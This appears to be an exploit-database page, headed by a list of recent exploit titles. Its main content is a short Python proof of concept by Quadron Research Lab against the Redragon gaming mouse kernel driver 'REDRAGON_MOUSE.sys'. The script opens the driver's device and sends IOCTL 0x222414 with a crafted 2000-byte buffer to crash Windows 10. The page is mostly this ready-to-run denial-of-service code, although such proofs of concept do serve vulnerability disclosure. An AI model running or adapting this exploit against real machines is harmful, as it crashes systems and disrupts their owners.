c18c22e3d9
8 changes to exploits/shellcodes Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC) Gurock Testrail 7.2.0.3014 - 'files.md5' Improper Access Control Wordpress Plugin 3DPrint Lite 1.9.1.4 - Arbitrary File Upload Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF) WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS) WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF) Budget and Expense Tracker System 1.0 - Arbitrary File Upload Police Crime Record Management Project 1.0 - Time Based SQLi
32 lines
No EOL
914 B
Python
Executable file
32 lines
No EOL
914 B
Python
Executable file
# Exploit Title: Redragon Gaming Mouse - 'REDRAGON_MOUSE.sys' Denial-Of-Service (PoC)
|
|
# Date: 27/08/2021
|
|
# Exploit Author: Quadron Research Lab
|
|
# Version: all version
|
|
# Tested on: Windows 10 x64 HUN/ENG Professional
|
|
# Vendor: https://www.redragonzone.com/pages/download
|
|
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/REDRAGON_MOUSE
|
|
|
|
|
|
import ctypes, sys
|
|
from ctypes import *
|
|
import io
|
|
from itertools import product
|
|
from sys import argv
|
|
|
|
devicename = "REDRAGON_MOUSE"
|
|
|
|
ioctl = 0x222414
|
|
|
|
kernel32 = windll.kernel32
|
|
hevDevice = kernel32.CreateFileA("\\\\.\\GLOBALROOT\\Device\REDRAGON_MOUSE", 0xC0000000, 0, None, 0x3, 0, None)
|
|
|
|
if not hevDevice or hevDevice == -1:
|
|
print ("Not Win! Sorry!")
|
|
|
|
else:
|
|
print ("OPENED!")
|
|
|
|
buf = '\x44' * 1000 + '\x00' * 1000
|
|
bufLength = 2000
|
|
|
|
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None) |